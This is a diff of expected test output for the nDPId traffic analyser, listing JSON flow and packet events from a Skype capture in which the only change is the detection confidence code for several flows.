00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1209,"source":"skype.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":3,"flow_last_seen":1431969690604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969690604,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+KpAAEAGYGfAqAEinTeCsMOdnFaE5icr8gQMKoAQECyTZwAAAQEICj4jRt9OpROb"} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1217,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691076,"flow_last_seen":1431969691076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969691076,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.173","src_port":50078,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -714,20 +714,20 @@ 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1229,"source":"skype.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":3,"flow_last_seen":1431969691204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691204,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0APxAAEAGWBnAqAEinTeCrcOeAbsMd47rg+uInYAQECyCfgAAAQEICj4jSTBOp78j"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA03rMAAEARUOLAqAEi1cezkTLdnFsAIONWnJoCpMZAnYkDnzYrDpEHe3Wyl3Fm6DsP"} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"skype.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA38a4AAEARPmXAqAEinTfroDLdnFsAI2YonJwCbYbrE4NbR6JS44ONijeTgTVa37UWYcSt"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1241,"source":"skype.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1431969691496,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969691496,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/mMEAAEARl0\/AqAEinTfrmzLdnEMAK8StnJ4Ceg13qBmaNbQ5r3u++QJg+\/7hY4I5I2kK1W2d7qoWGw0="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1242,"source":"skype.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969691496,"flow_last_seen":1431969691496,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969691496,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.155","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692087,"flow_last_seen":1431969692087,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969692087,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":50081,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1250,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1431969692087,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692087,"pkt":"0NQSxnP1PBXCt3IOCABFAABAWFBAAEAGALbAqAEinTeCsMOhAbuvVQecAAAAALAC\/\/9OOgAAAgQFtAEDAwUBAQgKPiNMnwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1253,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":2,"flow_last_seen":1431969692210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969692210,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7w6FI4LuBr1UHnaASOJC+bQAAAgQFrAQCCApOpRUtPiNMnwEDAwk="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1254,"source":"skype.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":3,"flow_last_seen":1431969692210,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969692210,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0dU1AAEAG48TAqAEinTeCsMOhAbuvVQedSOC7goAQECwVHQAAAQEICj4jTRpOpRUt"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_packet_id":1,"flow_last_seen":1431969692507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969692507,"pkt":"0NQSxnP1PBXCt3IOCABFAABAlm8AAEARZQTAqAEib91NkjLdgQkALPOBnKACf9Ciuj22pCihR6NIjTKXTxwVlkuMzvocVlIJl4RJ8z3V"} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1261,"source":"skype.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969692507,"flow_last_seen":1431969692507,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969692507,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969695483,"flow_last_seen":1431969695483,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969695483,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.142","src_port":50086,"dst_port":40023,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1298,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":1,"flow_last_seen":1431969695483,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969695483,"pkt":"0NQSxnP1PBXCt3IOCABFAABAoJZAAEAGGuzAqAEib91NjsOmnFcVc978AAAAALAC\/\/\/LYQAAAgQFtAEDAwUBAQgKPiNZ1AAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1302,"source":"skype.pcap","alias":"nDPId-test","flow_id":211,"flow_packet_id":2,"flow_last_seen":1431969695778,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969695778,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGxIZv3U2OwKgBIpxXw6bHcDhRFXPe\/aASOJD2ggAAAgQFrAQCCApNjF\/4PiNZ1AEDAwk="} @@ -743,14 +743,14 @@ 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1346,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1431969698508,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969698508,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIoEQAAEARVbXAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1431969698743,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1431969698743,"pkt":"0NQSxnP1PBXCt3IOCABFAABEy5wAAEARK5nAqAEiwKgBAfdZADUAMBpr\/I4BAAABAAAAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1352,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698743,"flow_last_seen":1431969698743,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1431969698743,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":2,"flow_last_seen":1431969698797,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1431969698797,"pkt":"PBXCt3IO0NQSxnP1CABFAABUAABAAEARtyXAqAEBwKgBIgA191kAQKAy\/I6BgAABAAEAAAAABWU0NTkzAWcKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAABAABBfOIaY="} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1353,"source":"skype.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1431969698743,"flow_last_seen":1431969698797,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63321,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"e4593.g.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.206.33.166"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969698797,"flow_last_seen":1431969698797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969698797,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1431969698797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969698797,"pkt":"0NQSxnP1PBXCt3IOCABFAABASetAAEAG9Y7AqAEiF84hpsOqAbtGC\/RmAAAAALAC\/\/+XCwAAAgQFtAEDAwUBAQgKPiNmuAAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":2,"flow_last_seen":1431969698840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969698840,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADkGRn4XziGmwKgBIgG7w6oZSGV1Rgv0Z6ASOJDhugAAAgQFrAQCCArsLyLPPiNmuAEDAwU="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":3,"flow_last_seen":1431969698840,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969698840,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ZSJAAEAG2mPAqAEiF84hpsOqAbtGC\/RnGUhldoAQECw4twAAAQEICj4jZuLsLyLP"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1357,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431969698797,"flow_last_seen":1431969698841,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1431969698841,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"apps.skype.com","ja3":"3d49c0a7161d6636fcb6973f14e05046","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969699142,"flow_last_seen":1431969699142,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969699142,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":50091,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1358,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1431969699142,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969699142,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQstAAEAGrVjAqAEinTfrksOrAbuMrH5PAAAAALAC\/\/911AAAAgQFtAEDAwUBAQgKPiNoDgAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1360,"source":"skype.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":2,"flow_last_seen":1431969699217,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969699217,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iedN+uSwKgBIgG7w6sASTQ1jKx+UKASOJCu2QAAAgQFrAQCCApMXR6HPiNoDgEDAwk="} @@ -801,17 +801,17 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1590,"source":"skype.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":3,"flow_last_seen":1431969711097,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969711097,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CpBAAEAGnRXAqAEinTg0HMO8nEnrI3U0Hv\/4VYAQECx2mwAAAQEICj4jloNMXGQg"} 